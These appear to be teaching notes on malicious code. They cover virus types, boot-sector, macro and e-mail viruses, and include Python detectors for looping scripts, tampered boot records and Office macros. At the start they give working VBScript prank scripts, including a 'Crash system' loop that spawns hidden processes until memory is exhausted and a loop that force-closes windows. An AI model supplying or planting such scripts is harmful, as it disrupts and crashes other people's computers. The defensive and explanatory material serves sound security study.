Virus I
Virus:
1) Open Notepad, type the following and save it as fakemsg.vbs:
do
msgbox "System Error : 432"
loop
This script displays a message box with the message "System Error : 432". Because the
MsgBox call sits inside a Do...Loop with no exit condition, the box is shown again as
soon as it is closed, indefinitely.
Go to Start -> Run and type the full path to the script, including the script name.
To stop a script running under WScript, you need to end the host process in Windows
Task Manager, since closing the message box only makes the loop create a new one.
Open Task Manager (right-click the taskbar and select Task Manager, or type
taskmgr in the Run dialog box), find wscript.exe in the Processes tab and end it.
The same can be done from a command prompt with: taskkill /F /IM wscript.exe
2) Crash system: Open Notepad, type the following and save it as crashsystem.vbs:
set ws=CreateObject("wscript.shell")
do
ws.run "notepad",0
loop
This script launches Notepad in hidden mode in an infinite loop; every iteration starts a
new notepad.exe process, so memory is exhausted and the system slows to a crawl or
crashes.
The value "0" in the third line is the window-style argument of the WScript.Shell Run
method and specifies how the launched application's window appears; 0 means hidden,
so the user sees nothing while the processes accumulate.
3) The following script sends Alt+F4 (the SendKeys sequence "%{F4}", where % stands
for the Alt key) to whichever window has focus every 5 seconds, so the user cannot keep
any application open:
set ws=CreateObject("wscript.shell")
do
ws.sendkeys "%{F4}"
wscript.sleep 5000
loop
WScript.Sleep takes milliseconds: to close a window every 15 seconds instead of every 5,
change "5000" to "15000".
4) This script launches WISPTIS.EXE (a Windows tablet-input component, if present on
the system) four times in hidden mode. Unlike the Do...Loop scripts above, the For...Next
loop is bounded, so the effect is limited to four hidden processes:
set ws=Createobject("wscript.shell")
for i=1 to 4
ws.run "WISPTIS.EXE",0
next
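As an added example (not part of the original notes), the following Python script is a small heuristic scanner that flags the pattern the prank scripts above share: a Do...Loop with no exit condition combined with a WScript.Shell action (a hidden Run, SendKeys) or a MsgBox. The sample inputs are the scripts from these notes, constructed inline, plus a constructed benign script that also creates WScript.Shell but exits its loop; the indicator names and the "suspicious"/"clean" verdict are this example's own, not any product's.

```python
import re

# Constructed samples: the scripts shown in the notes, plus a harmless
# script that also uses WScript.Shell but exits its loop after one pass.
FAKEMSG_VBS = '''do
msgbox "System Error : 432"
loop
'''

CRASHSYSTEM_VBS = '''set ws=CreateObject("wscript.shell")
do
ws.run "notepad",0
loop
'''

SENDKEYS_VBS = '''set ws=CreateObject("wscript.shell")
do
ws.sendkeys "%{F4}"
wscript.sleep 5000
loop
'''

BENIGN_VBS = '''set ws=CreateObject("wscript.shell")
i = 0
do
ws.run "notepad", 1   ' visible window
i = i + 1
loop until i >= 1
'''

UNBOUNDED = 'unbounded Do...Loop'
SHELL_RE = re.compile(r'createobject\s*\(\s*"wscript\.shell"\s*\)', re.I)
HIDDEN_RUN_RE = re.compile(r'\.run\s+.*,\s*0\s*(,|$)', re.I | re.M)  # window style 0
SENDKEYS_RE = re.compile(r'\.sendkeys\s', re.I)
MSGBOX_RE = re.compile(r'^\s*msgbox\b', re.I | re.M)


def _strip_comment(line):
    """Remove a trailing VBScript comment (an apostrophe outside a string)."""
    out, in_str = [], False
    for ch in line:
        if ch == '"':
            in_str = not in_str
        elif ch == "'" and not in_str:
            break
        out.append(ch)
    return ''.join(out)


def has_unbounded_loop(script):
    """True if any Do...Loop has no condition on Do or Loop and no Exit Do."""
    lines = [_strip_comment(raw).strip().lower() for raw in script.splitlines()]
    for i, line in enumerate(lines):
        m = re.match(r'do\b(.*)', line)
        if not m:
            continue
        bounded = bool(m.group(1).strip())          # "do while ..." / "do until ..."
        depth = 1
        for stmt in lines[i + 1:]:
            if re.match(r'do\b', stmt):
                depth += 1
            elif re.match(r'loop\b', stmt):
                depth -= 1
                if depth == 0:
                    bounded = bounded or stmt != 'loop'   # "loop until ..." / "loop while ..."
                    break
            elif depth == 1 and stmt.startswith('exit do'):
                bounded = True
        if not bounded:
            return True
    return False


def scan(script):
    """Return the list of indicators found in one VBScript source."""
    findings = []
    if has_unbounded_loop(script):
        findings.append(UNBOUNDED)
    if SHELL_RE.search(script):
        findings.append('WScript.Shell created')
    if HIDDEN_RUN_RE.search(script):
        findings.append('process launched hidden (window style 0)')
    if SENDKEYS_RE.search(script):
        findings.append('keystroke injection via SendKeys')
    if MSGBOX_RE.search(script):
        findings.append('MsgBox shown')
    return findings


def verdict(script):
    """'suspicious' when an unbounded loop drives a shell or UI action."""
    findings = scan(script)
    action = any(f != UNBOUNDED for f in findings)
    return 'suspicious' if UNBOUNDED in findings and action else 'clean'


if __name__ == '__main__':
    for name, src in [('fakemsg.vbs', FAKEMSG_VBS), ('crashsystem.vbs', CRASHSYSTEM_VBS),
                      ('sendkeys loop', SENDKEYS_VBS), ('benign', BENIGN_VBS)]:
        print(name, verdict(src), scan(src))
```

The scanner is a heuristic, and a weak one on purpose: a While...Wend loop or a loop whose condition is always true would slip past it, which is the same limitation that signature-based detection has against simple viruses. It does illustrate what separates these scripts from ordinary automation, namely an action that never stops; once such a script is running, the fix is to end the wscript.exe host process as described above, not to keep closing its windows.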
Malicious code can do nothing at first: planted, it lies dormant and undetected until some
event triggers it to act. The trigger can be a time or date, an event, a condition, a count,
or a combination of these.
The agent is the writer of the program or the person who causes its distribution.
Virus:
A virus is a program that can replicate itself and pass on malicious code to other
nonmalicious programs by modifying them.
Transient virus: its life depends on the life of its host; the virus runs when its attached
program executes and terminates when its attached program ends.
Resident virus: locates itself in memory; it can then remain active, or be activated as a
stand-alone program, even after its attached program ends.
Trojan horse:
Gets installed along with an infected but apparently legitimate program that carries it.
Once installed on the target machine, it can perform various malicious operations such
as deleting files, transmitting files to the intruder, modifying files, installing other
programs that provide unauthorized access, and executing privilege-escalation attacks.
Malicious code types:
Logic bomb: a class of malicious code that runs when a specified condition occurs.
Trapdoor or backdoor: an undocumented entry point through which someone can access
the program with special privileges.
Rabbit: a virus or worm that self-replicates without bound and so tries to exhaust
resources. A rabbit might, for example, create copies of itself and store them on the disk
until the disk is completely full.
Worm: spreads copies of itself as a stand-alone program, whereas a virus spreads copies
of itself as a program that attaches to or embeds in other programs.
A virus can be attached to e-mail; the virus writer must then convince the victim to open the attachment.
1) Appended viruses:
The virus is attached to the original program so that it gains control when the program
is invoked, runs before the original code, and can arrange to regain control after the
original code finishes (a virus that surrounds the program in this way has control both
before and after its execution).
If the virus is stored on disk, the file's name or its changed size may help in detecting it.
A virus writer may therefore attach the virus to the program that constructs the listing of
files on disk. If the virus regains control after the listing program has generated the list
but before the listing is displayed or printed, the virus can eliminate its own entry from
the listing.
2) Integrated viruses:
The virus replaces some of the target's code and integrates itself into the original code of
the target, leaving no separately attached block to look for.
Document viruses:
Implemented within a formatted document, such as a written document, a database, a
slide presentation, a picture, or a spreadsheet.
These documents are highly structured files that contain both data and commands
(included in macros, variables, procedures, file accesses, and system calls).
The virus writer can use any feature of the document format to perform malicious activity.
• It is hard to detect.
• It is easy to create.
An e-mail virus spreads in one of two ways.
In the first case, the virus generates a new e-mail message to every address in the
victim's address book. These new messages contain a copy of the virus, so that it
propagates widely.
• The next recipient opens the attachment because it appears to come from a friend. For
example, the subject line or message body may read "I thought you might enjoy this
picture from our vacation."
In the second case, the virus writer leaves the infected file for the victim to forward
unknowingly. If the virus's effect is not immediately obvious, the victim may pass the
infected file unwittingly to other victims.
Boot sector viruses:
• After the hardware self-test, the operating system is loaded dynamically, perhaps even
by the user's choice.
• The operating system is software stored on disk. A bootstrap (often just "boot") load
copies the operating system from disk to memory and transfers control to it; the name
comes from the operating system figuratively pulling itself into memory by its bootstraps.
• The firmware does its control transfer by reading a fixed number of bytes from a fixed
location on the disk called the boot sector to a fixed address in memory and then
jumping to that address (which will turn out to contain the first instruction of the
bootstrap loader).
• The bootstrap loader then reads into memory the rest of the operating system from
disk.
• To run a different operating system, the user just inserts a disk with the new operating
system and a bootstrap loader.
• When the user reboots from this new disk, the loader there brings in and runs another
operating system. This same scheme is used for personal computers, workstations, and
large mainframes.
• A boot sector virus places itself in, or chains itself in front of, the bootstrap loader, so
it gains control very early in the boot process, before the operating system and most
detection tools are active.
• The files in the boot area are crucial parts of the operating system. To keep users from
accidentally modifying or deleting them with disastrous results, the operating system
makes them "invisible" by not showing them as part of a normal listing of stored files
and by preventing their deletion; the same invisibility helps conceal a virus hiding there.
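The fixed location and fixed size described above are what make the boot sector easy to baseline. As an added example that is not from the original notes, the following Python parses a classic 512-byte master boot record, checks the 0xAA55 signature and the partition table, and compares a SHA-256 hash of the 446-byte boot-code area against a recorded baseline, which is how a boot-sector integrity checker notices a virus that has put itself in front of the loader. The MBR bytes are constructed inside the script rather than read from a real disk, and tamper_boot_code only overwrites the first few bytes of that sample to stand in for an infection.

```python
import hashlib
import struct

SECTOR_SIZE = 512
BOOT_CODE_LEN = 446       # bytes 0..445: bootstrap code
PART_TABLE_OFF = 446      # four 16-byte partition entries follow the code
SIGNATURE_OFF = 510       # 0x55 0xAA on disk, read little-endian as 0xAA55
PART_ENTRY = '<B3sB3sII'  # status, CHS start, type, CHS end, LBA start, sector count


def build_sample_mbr():
    """Constructed 512-byte MBR, not taken from any real disk: NOP-filled
    boot code, one bootable partition of type 0x07, valid signature."""
    code = b'\x90' * BOOT_CODE_LEN
    entry = struct.pack(PART_ENTRY, 0x80, b'\x00\x02\x00', 0x07,
                        b'\xfe\xff\xff', 2048, 204800)
    table = entry + b'\x00' * (16 * 3)          # three unused entries
    return code + table + b'\x55\xaa'


def parse_mbr(sector):
    """Return signature status, the non-empty partitions and a hash of the code area."""
    if len(sector) != SECTOR_SIZE:
        raise ValueError('expected exactly one 512-byte sector')
    signature = struct.unpack_from('<H', sector, SIGNATURE_OFF)[0]
    partitions = []
    for n in range(4):
        status, _, ptype, _, lba, count = struct.unpack_from(
            PART_ENTRY, sector, PART_TABLE_OFF + 16 * n)
        if ptype != 0:
            partitions.append({'bootable': status == 0x80, 'type': ptype,
                               'lba_start': lba, 'sectors': count})
    return {'signature_ok': signature == 0xAA55,
            'partitions': partitions,
            'code_sha256': hashlib.sha256(sector[:BOOT_CODE_LEN]).hexdigest()}


def check_boot_sector(sector, baseline_code_sha256):
    """Return a list of problems; an empty list means the sector matches the baseline."""
    info = parse_mbr(sector)
    problems = []
    if not info['signature_ok']:
        problems.append('missing 0xAA55 boot signature')
    if info['code_sha256'] != baseline_code_sha256:
        problems.append('boot code differs from recorded baseline')
    if sum(1 for p in info['partitions'] if p['bootable']) != 1:
        problems.append('expected exactly one bootable partition')
    return problems


def tamper_boot_code(sector):
    """Simulated infection used to exercise the checker: replace the first
    bytes of the boot code (where a boot-sector virus would put its own entry
    jump) while leaving the partition table and signature intact, so the disk
    still looks bootable to the firmware."""
    patched = bytearray(sector)
    patched[0:3] = b'\xe9\x00\x01'   # a different jump instruction at the entry point
    return bytes(patched)


if __name__ == '__main__':
    clean = build_sample_mbr()
    baseline = parse_mbr(clean)['code_sha256']
    print('clean sector   :', check_boot_sector(clean, baseline) or 'ok')
    print('tampered sector:', check_boot_sector(tamper_boot_code(clean), baseline))
```

Hashing only the code area, not the whole sector, is deliberate: the partition table changes legitimately when disks are repartitioned, while the bootstrap code should never change outside an operating-system upgrade, so a changed hash there is worth an alert on its own. The baseline itself must be stored somewhere the infected system cannot rewrite, otherwise a virus that gains control before the checker can simply update it.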
Memory-resident viruses:
Examples of resident code are the routine that interprets keys pressed on the keyboard,
the code that handles error conditions that arise during a program's execution, or a
program that acts like an alarm clock, sounding a signal at a time the user determines.
Resident routines are sometimes called TSRs, for "terminate and stay resident" routines.
Virus writers also like to attach viruses to resident code because the resident code is
activated many times while the machine is running.
Each time the resident code runs, the virus does too. Once activated, the virus can look
for and infect uninfected carriers.
For example, after activation, a boot sector virus might attach itself to a piece of
resident code. Then, each time the virus was activated it might check whether any
removable disk in a disk drive was infected and, if not, infect it.
Macro viruses: A virus writer can create a virus macro that adds itself to the startup
directives for the application, so that it runs whenever the application is opened. It then
also embeds a copy of itself in data files, so that the infection spreads to anyone
receiving one or more of those files.
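Both the document-virus passage above and the macro passage come down to a document that carries executable macro code, so the first practical check is whether a file contains a macro project at all. As an added example that is not from the original notes, this Python inspects an Office Open XML package (the zip container used by .docx/.docm and their Excel and PowerPoint equivalents) for the two container-level signs of a VBA project: a part named vbaProject.bin and the content type application/vnd.ms-office.vbaProject declared in [Content_Types].xml. The two sample packages are constructed in memory with zipfile; the one "with macros" holds only an OLE2 header stub in place of a real VBA project, since the point here is detecting the indicators, not parsing the macro code. Legacy binary .doc/.xls files are OLE2 containers rather than zips, and the example only recognises them as needing a different parser.

```python
import io
import zipfile

VBA_CONTENT_TYPE = 'application/vnd.ms-office.vbaProject'
OLE_MAGIC = b'\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1'   # header of legacy binary Office (OLE2) files


def build_sample_package(with_macros):
    """Constructed minimal OOXML zip, not a real Word file: only the parts the
    check looks at are present."""
    overrides = ['<Override PartName="/word/document.xml" '
                 'ContentType="application/vnd.openxmlformats-officedocument.'
                 'wordprocessingml.document.main+xml"/>']
    if with_macros:
        overrides.append('<Override PartName="/word/vbaProject.bin" '
                         'ContentType="%s"/>' % VBA_CONTENT_TYPE)
    content_types = ('<?xml version="1.0" encoding="UTF-8"?>'
                     '<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types">'
                     + ''.join(overrides) + '</Types>')
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, 'w', zipfile.ZIP_DEFLATED) as z:
        z.writestr('[Content_Types].xml', content_types)
        z.writestr('word/document.xml', '<w:document/>')
        if with_macros:
            # stub standing in for the real OLE2 storage that holds the VBA modules
            z.writestr('word/vbaProject.bin', OLE_MAGIC + b'\x00' * 24)
    return buf.getvalue()


def macro_indicators(data):
    """Return container-level indicators that a document carries VBA macros."""
    if data.startswith(OLE_MAGIC):
        return ['legacy OLE2 document: inspect its VBA storage with an OLE parser']
    try:
        z = zipfile.ZipFile(io.BytesIO(data))
    except zipfile.BadZipFile:
        return ['not an OOXML package']
    findings = []
    with z:
        for name in z.namelist():
            if name.lower().endswith('vbaproject.bin'):
                findings.append('VBA project part present: ' + name)
        try:
            ctypes = z.read('[Content_Types].xml').decode('utf-8', 'replace')
        except KeyError:
            findings.append('[Content_Types].xml missing')
        else:
            if VBA_CONTENT_TYPE in ctypes:
                findings.append('content type declares a VBA project')
    return findings


def classify(data):
    """'macros' if VBA indicators were found, 'clean' for a macro-free OOXML
    package, 'review' when the format needs a deeper parser or is not OOXML."""
    findings = macro_indicators(data)
    if any(f.startswith(('VBA project part', 'content type declares')) for f in findings):
        return 'macros'
    if findings:
        return 'review'
    return 'clean'


if __name__ == '__main__':
    print('with macros   :', classify(build_sample_package(True)), macro_indicators(build_sample_package(True)))
    print('without macros:', classify(build_sample_package(False)))
```

The check deliberately ignores the file extension: the zip contents, not the name, decide whether macro code is present, which matters because the forwarding scenario above relies on recipients trusting a familiar-looking attachment. Finding a VBA project is only the first step; extracting and reading the macros (for example with the olevba tool from oletools, which also handles the legacy OLE2 formats) is what tells you whether an AutoOpen-style startup macro is actually doing anything malicious.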
Libraries:
Libraries are used by many programs, so malicious code residing there will have a broad
effect.
Libraries are also shared among users and transmitted from one user to another, a
practice that spreads the infection.
Finally, executing code in a library can pass on the viral infection to other transmission
media.
Compilers, loaders, linkers, runtime monitors, runtime debuggers, and even virus
control programs are good candidates for hosting viruses because they are widely
shared.